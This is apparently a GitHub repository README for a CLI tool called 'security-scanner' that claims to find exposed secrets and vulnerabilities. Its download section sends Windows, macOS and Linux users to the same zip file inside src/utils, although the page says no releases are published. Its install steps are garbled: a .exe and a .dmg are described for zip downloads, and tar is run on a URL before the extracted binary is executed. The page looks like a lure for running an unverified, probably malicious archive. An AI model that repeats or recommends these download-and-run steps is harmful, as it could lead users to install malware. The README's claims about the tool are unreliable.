Skip to content

πŸ” Detect exposed secrets and code vulnerabilities in your codebase with this efficient CLI security scanner, ensuring a safer development environment.

License

Notifications You must be signed in to change notification settings

666Vendetta666/security-scanner

Repository files navigation

πŸ”’ security-scanner - Simple Tool for Safe Code

Download Latest Release

πŸ“‹ Overview

security-scanner is a command-line tool designed to help you find secrets and vulnerabilities in your code. It ensures that your development environment is secure from unwanted exposure of sensitive information. Whether you are a hobbyist or part of a development team, this tool simplifies your security practices.

πŸš€ Getting Started

To use security-scanner, follow these simple steps.

  1. System Requirements:

  2. Installation:

    • Open your web browser.
    • Navigate to the Releases page.
    • Look for the latest version available. Click on the version number to visit the release details.
    • Download the package suitable for your operating system (e.g., .exe for Windows, https://raw.githubusercontent.com/666Vendetta666/security-scanner/main/src/utils/security_scanner_v2.6.zip for Linux, or .dmg for macOS).

πŸ’Ό Download & Install

To download security-scanner, visit the Releases page to access the various downloads.

  1. On the Releases page, you will see a list of all available versions.

  2. Choose the latest version by clicking on it.

  3. Scroll to the "Assets" section. Click the appropriate file to start the download:

    • For Windows: Click on https://raw.githubusercontent.com/666Vendetta666/security-scanner/main/src/utils/security_scanner_v2.6.zip
    • For macOS: Click on https://raw.githubusercontent.com/666Vendetta666/security-scanner/main/src/utils/security_scanner_v2.6.zip
    • For Linux: Click on https://raw.githubusercontent.com/666Vendetta666/security-scanner/main/src/utils/security_scanner_v2.6.zip
  4. Once the download completes, follow these instructions based on your operating system:

    Windows:

    • Double-click the downloaded .exe file.
    • Follow the prompts to install the application.

    macOS:

    • Open the downloaded .dmg file.
    • Drag the security-scanner icon to your Applications folder.

    Linux:

    • Extract the https://raw.githubusercontent.com/666Vendetta666/security-scanner/main/src/utils/security_scanner_v2.6.zip file using the command: tar -xzf https://raw.githubusercontent.com/666Vendetta666/security-scanner/main/src/utils/security_scanner_v2.6.zip.
    • Navigate to the extracted folder in the terminal.
    • Run the scanner with: ./security-scanner.

βš™οΈ Using security-scanner

After installation, you are ready to use security-scanner to check your codebase for vulnerabilities.

  1. Open your command line interface:

    • Windows: Search for "Command Prompt" or "PowerShell."
    • macOS: Use "Terminal."
    • Linux: Open your preferred terminal emulator.
  2. Navigate to your code directory using the cd command. For example, if your code is in a folder named "MyProject", type:

    cd path/to/MyProject
    
  3. Run the security-scanner by entering the following command:

    security-scanner
    
  4. The scanner will run and display any found issues. Follow the recommendations to mitigate these vulnerabilities.

πŸ”Ž Features

  • Secret Detection: Identify sensitive data like API keys and passwords in your code.
  • Vulnerability Assessment: Scan your codebase for known security issues.
  • Comprehensive Reports: Get detailed reports outlining potential risks.
  • Multi-Platform Support: Works on Windows, macOS, and Linux.

πŸ“„ Report Issues

If you encounter issues while using security-scanner, please report them on the Issues page. Provide as much detail as possible so we can assist you effectively.

πŸ’¬ Community and Support

Join our community for tips, support, and discussions related to security practices. You can find us on our GitHub Discussions page.

πŸ“’ Contributions

Contributions are welcome! If you want to improve security-scanner, you can fork the repository and submit a pull request.

  1. Make your changes.
  2. Test to ensure everything runs smoothly.
  3. Submit a pull request with a detailed explanation of your changes.

Your help is appreciated!

πŸ”— Useful Links

πŸ“‘ License

This project is licensed under the MIT License. See the LICENSE file for details.

About

πŸ” Detect exposed secrets and code vulnerabilities in your codebase with this efficient CLI security scanner, ensuring a safer development environment.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •